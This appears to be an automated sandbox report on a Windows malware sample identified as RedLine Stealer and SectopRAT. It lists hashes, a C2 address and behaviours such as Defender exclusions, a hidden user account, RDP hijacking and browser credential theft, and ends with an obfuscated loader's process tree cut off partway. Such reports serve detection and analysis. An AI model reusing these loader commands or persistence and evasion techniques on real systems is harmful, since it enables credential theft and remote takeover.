Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
27-12-2024 07:22
Static task
static1
Behavioral task
behavioral1
Sample
34807a743f2d680eef051852eaef0b16.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
34807a743f2d680eef051852eaef0b16.exe
Resource
win10v2004-20241007-en
General
-
Target
34807a743f2d680eef051852eaef0b16.exe
-
Size
4.1MB
-
MD5
34807a743f2d680eef051852eaef0b16
-
SHA1
4e63843e9c51f907952bb2f51d6b3866f81f7bd6
-
SHA256
02a193aa0cbdfae2d53e73431501edb4a263c1176ce5cbcb4e03e65a70df29ca
-
SHA512
65acb9f797e244e62cbe9aafae8acb55dbecf88c7924b333e787d907226debfad8324649eb629bdac864dcaf8cea1139a56b1e7b48933fef314e2f040978166a
-
SSDEEP
98304:G1EESMlQ/9IsCMdegeFbD+dQ5oVOAoso2iFugO+Nthm5mBF:G1EEP42s1cgzKoVK2iFtOWHmOF
Malware Config
Extracted
redline
adsbb
21jhss.club:80
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
resource yara_rule behavioral1/memory/1476-69-0x00000000000B0000-0x00000000000CC000-memory.dmp family_redline behavioral1/memory/1476-68-0x00000000000B0000-0x00000000000CC000-memory.dmp family_redline behavioral1/memory/1476-65-0x00000000000B0000-0x00000000000CC000-memory.dmp family_redline -
Redline family
-
SectopRAT payload 3 IoCs
resource yara_rule behavioral1/memory/1476-69-0x00000000000B0000-0x00000000000CC000-memory.dmp family_sectoprat behavioral1/memory/1476-68-0x00000000000B0000-0x00000000000CC000-memory.dmp family_sectoprat behavioral1/memory/1476-65-0x00000000000B0000-0x00000000000CC000-memory.dmp family_sectoprat -
Sectoprat family
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
pid Process 876 net.exe 2216 net1.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 29 2912 WScript.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 496 powershell.exe 1756 powershell.exe 1912 powershell.exe 2872 powershell.exe 3064 powershell.exe 1936 powershell.exe 2944 powershell.exe 1868 powershell.exe 2272 powershell.exe 2316 powershell.exe 1348 powershell.exe 2836 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Modifies Windows Firewall 2 TTPs 6 IoCs
pid Process 1248 netsh.exe 2168 netsh.exe 1916 netsh.exe 3040 netsh.exe 2832 netsh.exe 2272 netsh.exe -
Server Software Component: Terminal Services DLL 1 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe -
Executes dropped EXE 13 IoCs
pid Process 2960 Rifiutare.exe.com 2796 Rifiutare.exe.com 2908 Uno.exe.com 2768 Uno.exe.com 2624 Inebriato.exe.com 3040 Inebriato.exe.com 1476 RegAsm.exe 1940 RegAsm.exe 444 RegAsm.exe 2572 RDPWInst.exe 2992 RDPWInst.exe 2692 RDPWInst.exe 1576 RDPWInst.exe -
Loads dropped DLL 15 IoCs
pid Process 2732 cmd.exe 2732 cmd.exe 2732 cmd.exe 2796 Rifiutare.exe.com 3040 Inebriato.exe.com 1476 RegAsm.exe 2768 Uno.exe.com 1940 RegAsm.exe 444 RegAsm.exe 2376 cmd.exe 2376 cmd.exe 2840 Process not Found 2376 cmd.exe 2376 cmd.exe 1108 svchost.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 8 raw.githubusercontent.com 9 raw.githubusercontent.com 21 raw.githubusercontent.com 22 raw.githubusercontent.com -
Modifies WinLogon 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe -
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/memory/444-84-0x00000000002C0000-0x000000000049F000-memory.dmp autoit_exe behavioral1/memory/444-89-0x00000000002C0000-0x000000000049F000-memory.dmp autoit_exe behavioral1/memory/444-86-0x00000000002C0000-0x000000000049F000-memory.dmp autoit_exe -
Drops file in System32 directory 21 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\CatRoot2\edb.log svchost.exe File opened for modification C:\Windows\system32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb svchost.exe File opened for modification C:\Windows\System32\null cmd.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\dnsrsvlr.log svchost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\System32\null cmd.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\asyncreg.log svchost.exe File opened for modification C:\Windows\System32\null cmd.exe File opened for modification C:\Windows\system32\CatRoot2\edb.chk svchost.exe File opened for modification C:\Windows\system32\CatRoot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\catdb svchost.exe -
Hide Artifacts: Hidden Users 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\spaiKmXGMX = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\spaiKmXGMX = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\spaiKmXGMX = "0" reg.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2796 set thread context of 1476 2796 Rifiutare.exe.com 46 PID 2768 set thread context of 1940 2768 Uno.exe.com 48 PID 3040 set thread context of 444 3040 Inebriato.exe.com 47 -
Drops file in Program Files directory 9 IoCs
description ioc Process File opened for modification C:\Program Files\RDP Wrapper RegAsm.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File created C:\Program Files\RDP Wrapper\RDPWInst.exe RegAsm.exe File opened for modification C:\Program Files\RDP Wrapper\RDPWInst.exe RegAsm.exe File created C:\Program Files\RDP Wrapper\rdpwrap.bat RegAsm.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.bat RegAsm.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 580 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 18 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Uno.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fsutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Inebriato.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 34807a743f2d680eef051852eaef0b16.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language makecab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rifiutare.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Inebriato.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Uno.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cscript.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1552 PING.EXE -
Delays execution with timeout.exe 3 IoCs
pid Process 2920 timeout.exe 1284 timeout.exe 1920 timeout.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1552 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2364 schtasks.exe 816 schtasks.exe 3012 schtasks.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 29 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 2944 powershell.exe 1912 powershell.exe 2836 powershell.exe 2872 powershell.exe 3064 powershell.exe 1868 powershell.exe 2316 powershell.exe 2272 powershell.exe 1108 svchost.exe 1108 svchost.exe 496 powershell.exe 1756 powershell.exe 1348 powershell.exe 1936 powershell.exe -
Suspicious behavior: LoadsDriver 3 IoCs
pid Process 1108 svchost.exe 1108 svchost.exe 1108 svchost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1476 RegAsm.exe Token: SeIncreaseQuotaPrivilege 2572 WMIC.exe Token: SeSecurityPrivilege 2572 WMIC.exe Token: SeTakeOwnershipPrivilege 2572 WMIC.exe Token: SeLoadDriverPrivilege 2572 WMIC.exe Token: SeSystemProfilePrivilege 2572 WMIC.exe Token: SeSystemtimePrivilege 2572 WMIC.exe Token: SeProfSingleProcessPrivilege 2572 WMIC.exe Token: SeIncBasePriorityPrivilege 2572 WMIC.exe Token: SeCreatePagefilePrivilege 2572 WMIC.exe Token: SeBackupPrivilege 2572 WMIC.exe Token: SeRestorePrivilege 2572 WMIC.exe Token: SeShutdownPrivilege 2572 WMIC.exe Token: SeDebugPrivilege 2572 WMIC.exe Token: SeSystemEnvironmentPrivilege 2572 WMIC.exe Token: SeRemoteShutdownPrivilege 2572 WMIC.exe Token: SeUndockPrivilege 2572 WMIC.exe Token: SeManageVolumePrivilege 2572 WMIC.exe Token: 33 2572 WMIC.exe Token: 34 2572 WMIC.exe Token: 35 2572 WMIC.exe Token: SeIncreaseQuotaPrivilege 2572 WMIC.exe Token: SeSecurityPrivilege 2572 WMIC.exe Token: SeTakeOwnershipPrivilege 2572 WMIC.exe Token: SeLoadDriverPrivilege 2572 WMIC.exe Token: SeSystemProfilePrivilege 2572 WMIC.exe Token: SeSystemtimePrivilege 2572 WMIC.exe Token: SeProfSingleProcessPrivilege 2572 WMIC.exe Token: SeIncBasePriorityPrivilege 2572 WMIC.exe Token: SeCreatePagefilePrivilege 2572 WMIC.exe Token: SeBackupPrivilege 2572 WMIC.exe Token: SeRestorePrivilege 2572 WMIC.exe Token: SeShutdownPrivilege 2572 WMIC.exe Token: SeDebugPrivilege 2572 WMIC.exe Token: SeSystemEnvironmentPrivilege 2572 WMIC.exe Token: SeRemoteShutdownPrivilege 2572 WMIC.exe Token: SeUndockPrivilege 2572 WMIC.exe Token: SeManageVolumePrivilege 2572 WMIC.exe Token: 33 2572 WMIC.exe Token: 34 2572 WMIC.exe Token: 35 2572 WMIC.exe Token: SeIncreaseQuotaPrivilege 2996 WMIC.exe Token: SeSecurityPrivilege 2996 WMIC.exe Token: SeTakeOwnershipPrivilege 2996 WMIC.exe Token: SeLoadDriverPrivilege 2996 WMIC.exe Token: SeSystemProfilePrivilege 2996 WMIC.exe Token: SeSystemtimePrivilege 2996 WMIC.exe Token: SeProfSingleProcessPrivilege 2996 WMIC.exe Token: SeIncBasePriorityPrivilege 2996 WMIC.exe Token: SeCreatePagefilePrivilege 2996 WMIC.exe Token: SeBackupPrivilege 2996 WMIC.exe Token: SeRestorePrivilege 2996 WMIC.exe Token: SeShutdownPrivilege 2996 WMIC.exe Token: SeDebugPrivilege 2996 WMIC.exe Token: SeSystemEnvironmentPrivilege 2996 WMIC.exe Token: SeRemoteShutdownPrivilege 2996 WMIC.exe Token: SeUndockPrivilege 2996 WMIC.exe Token: SeManageVolumePrivilege 2996 WMIC.exe Token: 33 2996 WMIC.exe Token: 34 2996 WMIC.exe Token: 35 2996 WMIC.exe Token: SeIncreaseQuotaPrivilege 2996 WMIC.exe Token: SeSecurityPrivilege 2996 WMIC.exe Token: SeTakeOwnershipPrivilege 2996 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1968 wrote to memory of 3032 1968 34807a743f2d680eef051852eaef0b16.exe 30 PID 1968 wrote to memory of 3032 1968 34807a743f2d680eef051852eaef0b16.exe 30 PID 1968 wrote to memory of 3032 1968 34807a743f2d680eef051852eaef0b16.exe 30 PID 1968 wrote to memory of 3032 1968 34807a743f2d680eef051852eaef0b16.exe 30 PID 1968 wrote to memory of 2348 1968 34807a743f2d680eef051852eaef0b16.exe 32 PID 1968 wrote to memory of 2348 1968 34807a743f2d680eef051852eaef0b16.exe 32 PID 1968 wrote to memory of 2348 1968 34807a743f2d680eef051852eaef0b16.exe 32 PID 1968 wrote to memory of 2348 1968 34807a743f2d680eef051852eaef0b16.exe 32 PID 2348 wrote to memory of 2732 2348 cmd.exe 34 PID 2348 wrote to memory of 2732 2348 cmd.exe 34 PID 2348 wrote to memory of 2732 2348 cmd.exe 34 PID 2348 wrote to memory of 2732 2348 cmd.exe 34 PID 2732 wrote to memory of 2848 2732 cmd.exe 35 PID 2732 wrote to memory of 2848 2732 cmd.exe 35 PID 2732 wrote to memory of 2848 2732 cmd.exe 35 PID 2732 wrote to memory of 2848 2732 cmd.exe 35 PID 2732 wrote to memory of 2960 2732 cmd.exe 36 PID 2732 wrote to memory of 2960 2732 cmd.exe 36 PID 2732 wrote to memory of 2960 2732 cmd.exe 36 PID 2732 wrote to memory of 2960 2732 cmd.exe 36 PID 2732 wrote to memory of 2836 2732 cmd.exe 37 PID 2732 wrote to memory of 2836 2732 cmd.exe 37 PID 2732 wrote to memory of 2836 2732 cmd.exe 37 PID 2732 wrote to memory of 2836 2732 cmd.exe 37 PID 2960 wrote to memory of 2796 2960 Rifiutare.exe.com 38 PID 2960 wrote to memory of 2796 2960 Rifiutare.exe.com 38 PID 2960 wrote to memory of 2796 2960 Rifiutare.exe.com 38 PID 2960 wrote to memory of 2796 2960 Rifiutare.exe.com 38 PID 2732 wrote to memory of 2908 2732 cmd.exe 39 PID 2732 wrote to memory of 2908 2732 cmd.exe 39 PID 2732 wrote to memory of 2908 2732 cmd.exe 39 PID 2732 wrote to memory of 2908 2732 cmd.exe 39 PID 2908 wrote to memory of 2768 2908 Uno.exe.com 41 PID 2908 wrote to memory of 2768 2908 Uno.exe.com 41 PID 2908 wrote to memory of 2768 2908 Uno.exe.com 41 PID 2908 wrote to memory of 2768 2908 Uno.exe.com 41 PID 2732 wrote to memory of 1752 2732 cmd.exe 40 PID 2732 wrote to memory of 1752 2732 cmd.exe 40 PID 2732 wrote to memory of 1752 2732 cmd.exe 40 PID 2732 wrote to memory of 1752 2732 cmd.exe 40 PID 2732 wrote to memory of 2624 2732 cmd.exe 42 PID 2732 wrote to memory of 2624 2732 cmd.exe 42 PID 2732 wrote to memory of 2624 2732 cmd.exe 42 PID 2732 wrote to memory of 2624 2732 cmd.exe 42 PID 2624 wrote to memory of 3040 2624 Inebriato.exe.com 44 PID 2624 wrote to memory of 3040 2624 Inebriato.exe.com 44 PID 2624 wrote to memory of 3040 2624 Inebriato.exe.com 44 PID 2624 wrote to memory of 3040 2624 Inebriato.exe.com 44 PID 2732 wrote to memory of 1552 2732 cmd.exe 43 PID 2732 wrote to memory of 1552 2732 cmd.exe 43 PID 2732 wrote to memory of 1552 2732 cmd.exe 43 PID 2732 wrote to memory of 1552 2732 cmd.exe 43 PID 2796 wrote to memory of 1476 2796 Rifiutare.exe.com 46 PID 2796 wrote to memory of 1476 2796 Rifiutare.exe.com 46 PID 2796 wrote to memory of 1476 2796 Rifiutare.exe.com 46 PID 2796 wrote to memory of 1476 2796 Rifiutare.exe.com 46 PID 2796 wrote to memory of 1476 2796 Rifiutare.exe.com 46 PID 2796 wrote to memory of 1476 2796 Rifiutare.exe.com 46 PID 2796 wrote to memory of 1476 2796 Rifiutare.exe.com 46 PID 2796 wrote to memory of 1476 2796 Rifiutare.exe.com 46 PID 3040 wrote to memory of 444 3040 Inebriato.exe.com 47 PID 3040 wrote to memory of 444 3040 Inebriato.exe.com 47 PID 3040 wrote to memory of 444 3040 Inebriato.exe.com 47 PID 3040 wrote to memory of 444 3040 Inebriato.exe.com 47
Processes
-
C:\Users\Admin\AppData\Local\Temp\34807a743f2d680eef051852eaef0b16.exe"C:\Users\Admin\AppData\Local\Temp\34807a743f2d680eef051852eaef0b16.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\SysWOW64\makecab.exe"C:\Windows\System32\makecab.exe"2⤵
- System Location Discovery: System Language Discovery
PID:3032
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c WEHuzypTIfJLQWpZ & HMYPflMZogRtPmKziXCRecxqxWV & rIgSHQwdwGHxUulRaOS & cmd < Adunazione.aiff2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\SysWOW64\cmd.execmd3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff4⤵
- System Location Discovery: System Language Discovery
PID:2848
-
-
C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comRifiutare.exe.com D4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2960 -
C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comC:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com D5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeC:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1476
-
-
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff4⤵
- System Location Discovery: System Language Discovery
PID:2836
-
-
